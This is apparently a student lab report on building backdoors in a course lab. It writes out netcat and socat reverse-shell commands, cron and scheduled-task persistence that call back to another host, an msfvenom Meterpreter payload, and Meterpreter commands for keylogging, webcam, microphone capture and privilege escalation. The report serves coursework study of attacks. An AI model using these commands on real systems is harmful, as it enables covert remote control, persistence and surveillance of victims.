• 2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践


    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

    (1)例举你能想到的一个后门进入到你系统中的可能方式?
    在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒软件,此时后门植入系统就太轻松了。
    (2)例举你知道的后门如何启动起来(win及linux)的方式?
    win:任务计划启动
    linux:通过cron启动
    (3)Meterpreter有哪些给你映像深刻的功能?
    无论是截屏,拍照,还是录音,都会泄露隐私,特别是击键记录,盗取账号密钥十分容易。
    (4)如何发现自己有系统有没有被安装后门?
    通过查阅任务计划以及进程里是否有可疑项,安装杀毒软件也是一种方式。

    实验前先查看win和linux的IP地址便于后面的实验。

    Linux:192.168.199.128
    Win7:192.168.199.229

    学习ncat的使用

    1.Win获得Linux Shell

    • Win7打开cmd命令行,在ncat解压目录下,输入ncat.exe -l -p 52285228端口进行监听
    • 在Linux终端输入nc 192.168.199.229 5228 -e /bin/sh反弹连接Win75228端口
    • Win7已获得Linux shell,输入ls验证结果

      成功

    2.Linux获得Win Shell

    • Linux下打开一个终端,输入nc -l -p 52285228端口进行监听

    • 在Win7命令行输入ncat.exe -e cmd.exe 192.168.199.128 5228反弹连接Linux5228端口

    • Linux已获得Win7 shell,输入dir验证结果

    成功
    3.使用nc传输信息

    • Win7命令行输入 ncat.exe -l 5228监听5228端口

    • Linux终端输入nc 192.168.199.229 5228反弹连接Win75228端口

    • 建立连接后可互传信息

    4.使用nc传输文件

    • Win7命令行输入 ncat.exe -l 5228 > 2.txt监听5228端口,并设置收到的文件重定向保存到2.txt

    • Linux终端输入nc 192.168.199.229 5228 < 1.txt反弹连接Win75228端口

    • Win7可收到Linux发来的文件。

    实验内容

    任务一:使用netcat获取主机操作Shell,cron启动

    1、设定cron
    Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。详细说明可以"man cron"。

    • Win7中打开对端口5228端口的监听。
      ncat.exe -l -p 5228
    • Linux下使用crontab -e指令增加一条定时任务,-e表示编辑
    • 选择3,即编辑器。
      根据 m分钟 h小时 dom日期 mon月 dow周几 command执行的命令的格式添加最后一行33 * * * * /bin/netcat 192.168.199.229 5228 -e /bin/sh

    保存退出

    • 结果验证:Win7得到Linux Shell

    任务二:使用socat获取主机操作Shell, 任务计划启动

    1、新建任务计划

    • 原理: 在主控机的nc打开对5228端口的监听时,受控机的每一次锁定时都会启动ncat,相当于在cmd执行ncat.exe -e cmd.exe 192.168.199.128 5228,从而反弹连接到Linux。即Linux得到Win7 shell。
      新建触发器:当锁定任何用户的工作站时

    新建操作:
    启动程序:socat所在路径socat.exe
    添加参数:tcp-listen:5228 exec:cmd.exe,pty,stderr

    2、锁定计算机,让该任务计划运行。再次唤醒计算机,可以看到刚新建的任务已启动,

    3、Linux终端输入socat - tcp:192.168.199.229:5228,结果验证:Linux得到了Win7 shell

    任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    • 在Linux终端执行msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168. 199.128 LPORT=5228 -f exe > 20165228_backdoor.exe生成后门程序20165228_backdoor.exe

    • Win7下执行ncat.exe -l 5228 > 20165228_backdoor.exe监听5228端口,并将收到的文件重定向保存到20165228_backdoor.exe

    • Linux终端执行nc 192.168.199.229 5228 < 20165228_backdoor.exe反弹连接Win7并传输文件20165228_backdoor.exe

    • Linux终端执行msfconsole命令,并设置好IP地址和端口号

    msf > use exploit/multi/handler
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(handler) > show options
    

    • 执行监听

    • Win7运行后门程序

    • Linux平台的监听进程将获得Win主机的主动连接,并得到远程控制shell。

    任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    • record_mic录制一段音频

    • webcam_snap使用摄像头拍照

    • keyscan_start开始记录击键,keyscan_dump读取记录

    • screenshot进行截屏

    • getuid查看当前用户并执行getsysyem进行提权操作

    实验中遇到的问题

    1、我尝试过用Linux监听端口,Win7反弹连接Linux却提示由于目标计算机积极拒绝,无法连接
    解决:尚未解决
    2、在最后getsystem获取权限时失败
    解决:在尝试一些博客中的方法后,发现好像还是不行,但是了解到了msf使用的是自带的提权方法,只尝试了4个payload,所以大部分都会失败。

    实验感想

    • 此次实验的内容让我十分感兴趣,仅仅通过一些简单的指令就可以实现shell权限的获取,也让我明白了信息安全的重要性,特别是在尝试录音、拍照、截屏等操作后,让我认识到信息的泄露太可怕了。这让我更加想要学好网络攻防这门课,深入了解和掌握这些技能。
  • 相关阅读:
    深入理解java垃圾回收算法
    JVM类加载机制与对象的生命周期
    JVM 类加载机制详解
    从经典面试题看java中类的加载机制
    Intellij IDEA常用快捷键介绍 Intellij IDEA快捷键大全汇总
    Java HashMap 如何正确遍历并删除元素
    记录Java的垃圾回收机制和几种引用
    浅谈jvm中的垃圾回收策略
    Mysql常见四种索引的使用
    Java虚拟机垃圾回收(三) 7种垃圾收集器
  • 原文地址:https://www.cnblogs.com/cloud795/p/10568205.html
Copyright © 2020-2023  润新知